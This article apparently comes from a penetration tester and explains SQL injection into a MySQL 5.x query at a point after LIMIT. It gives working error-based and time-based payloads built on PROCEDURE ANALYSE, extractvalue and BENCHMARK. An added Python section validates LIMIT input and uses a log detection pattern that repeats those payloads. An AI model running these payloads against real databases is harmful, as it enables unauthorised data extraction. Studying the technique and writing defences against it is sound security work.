Using MySQL injection points after the LIMIT keyword
Countless articles describe SQL injection methods; this article covers one special case.
Details
During a test I ran into an SQL injection problem for which I could not find a solution online. The injection point was after the LIMIT keyword, the database was MySQL 5.x, and the SQL statement looked like this:
SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT [injection point]
The crux of the problem is that the statement contains an ORDER BY clause. In MySQL, UNION has to appear before ORDER BY, so if there were no ORDER BY before the injection point, UNION could be used without trouble; here, however, ORDER BY precedes the injection point. This problem has been discussed on Stack Overflow and sla.ckers, but no effective solution was given.
Let's look at the SELECT syntax in MySQL 5.x:
SELECT
    [ALL | DISTINCT | DISTINCTROW ]
    [HIGH_PRIORITY]
    [STRAIGHT_JOIN]
    [SQL_SMALL_RESULT] [SQL_BIG_RESULT] [SQL_BUFFER_RESULT]
    [SQL_CACHE | SQL_NO_CACHE] [SQL_CALC_FOUND_ROWS]
    select_expr [, select_expr ...]
    [FROM table_references
    [WHERE where_condition]
    [GROUP BY {col_name | expr | position}
      [ASC | DESC], ... [WITH ROLLUP]]
    [HAVING where_condition]
    [ORDER BY {col_name | expr | position}
      [ASC | DESC], ...]
    [LIMIT {[offset,] row_count | row_count OFFSET offset}]
    [PROCEDURE procedure_name(argument_list)]
    [INTO OUTFILE 'file_name' export_options
      | INTO DUMPFILE 'file_name'
      | INTO var_name [, var_name]]
    [FOR UPDATE | LOCK IN SHARE MODE]]
After LIMIT, the grammar still allows the PROCEDURE and INTO keywords. INTO can be used to write files, but that is not the point of this article; the focus here is PROCEDURE. By default, MySQL provides only one procedure, ANALYSE (see the MySQL documentation).
Try this procedure:
mysql> SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT 1,1 PROCEDURE ANALYSE(1);
ERROR 1386 (HY000): Can't use ORDER clause with this procedure
ANALYSE accepts two parameters. Try it with both:
mysql> SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT 1,1 PROCEDURE ANALYSE(1,1);
ERROR 1386 (HY000): Can't use ORDER clause with this procedure
Still rejected. Next, try embedding a subquery in the ANALYSE arguments:
mysql> SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT 1,1 PROCEDURE ANALYSE((SELECT IF(MID(version(),1,1) LIKE 5, sleep(5),1)),1);
The response is:
ERROR 1108 (HY000): Incorrect parameters to procedure 'analyse'
So SLEEP() was never executed. In the end, I tried the following payload:
mysql> SELECT field FROM user WHERE id > 0 ORDER BY id LIMIT 1,1 PROCEDURE ANALYSE(extractvalue(rand(),concat(0x3a,version())),1);
ERROR 1105 (HY000): XPATH syntax error: ':5.5.41-0ubuntu0.14.04.1'
Aha: the above is ordinary error-based injection. So if the injection point returns database errors to the client, the problem is solved. If it does not, time-based injection is still possible; the payload is as follows:
SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT 1,1 PROCEDURE ANALYSE((SELECT extractvalue(rand(),concat(0x3a,(IF(MID(version(),1,1) LIKE 5, BENCHMARK(5000000,SHA1(1)),1))))),1)
Note that SLEEP() is not used here; BENCHMARK() is used instead, since the attempt with SLEEP() above was rejected with "Incorrect parameters to procedure".
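From the defender's side, the scenario above has two practical answers: never let user input reach the LIMIT clause as text, and watch the query log for LIMIT clauses followed by PROCEDURE ANALYSE carrying error- or timing-based functions. The following is an added example, not code from the original article; MAX_ROWS, the table name and the general-log lines are constructed assumptions.

```python
import re

# Added example, not code from the original article: an application-side guard and a
# general-log check for the "injection after LIMIT" scenario described above. The log
# lines are constructed samples in MySQL general-log style, not real captures.

MAX_ROWS = 100                    # assumed application page-size limit
_INT = re.compile(r"^\d{1,9}$")   # digits only: no sign, whitespace or underscore

def build_query(offset, row_count):
    """Build the SELECT with a LIMIT clause made only from validated integers.

    Anything that is not a plain non-negative integer, such as the string
    "1,1 PROCEDURE ANALYSE(...)", raises ValueError and never reaches MySQL.
    """
    off, cnt = str(offset), str(row_count)
    if not (_INT.match(off) and _INT.match(cnt)):
        raise ValueError("LIMIT values must be plain non-negative integers")
    if int(cnt) > MAX_ROWS:
        raise ValueError("row count exceeds MAX_ROWS")
    # Only the two validated integers are interpolated into the statement.
    return f"SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT {int(off)},{int(cnt)}"

# A LIMIT clause followed by PROCEDURE ANALYSE( whose arguments call one of the
# error-based or timing functions used in the article. A plain ANALYSE(10,256)
# issued by a legitimate client does not match, which keeps false positives low.
SUSPECT = re.compile(
    r"\bLIMIT\b.*\bPROCEDURE\s+ANALYSE\s*\(.*\b(EXTRACTVALUE|BENCHMARK|SLEEP)\s*\(",
    re.IGNORECASE | re.DOTALL,
)

def flag_suspicious(log_lines):
    """Return the log lines whose query text matches SUSPECT."""
    return [line for line in log_lines if SUSPECT.search(line)]

SAMPLE_GENERAL_LOG = [  # constructed samples, one query per line
    "2024-01-01T10:00:00Z\t12 Query\tSELECT field FROM table WHERE id > 0 ORDER BY id LIMIT 1,1",
    "2024-01-01T10:00:01Z\t12 Query\tSELECT field FROM table WHERE id > 0 ORDER BY id LIMIT 1,1 "
    "PROCEDURE analyse(extractvalue(rand(),concat(0x3a,version())),1)",
    "2024-01-01T10:00:02Z\t13 Query\tSELECT field FROM table WHERE id > 0 ORDER BY id LIMIT 1,1 "
    "PROCEDURE ANALYSE(10,256)",
    "2024-01-01T10:00:03Z\t14 Query\tSELECT field FROM table WHERE id > 0 ORDER BY id LIMIT 1,1 "
    "PROCEDURE analyse((select extractvalue(rand(),concat(0x3a,(IF(MID(version(),1,1) "
    "LIKE 5, BENCHMARK(5000000,SHA1(1)),1))))),1)",
]
```

Run flag_suspicious(SAMPLE_GENERAL_LOG) to see that only the two payload lines are reported, while the legitimate ANALYSE(10,256) call and the plain LIMIT query pass.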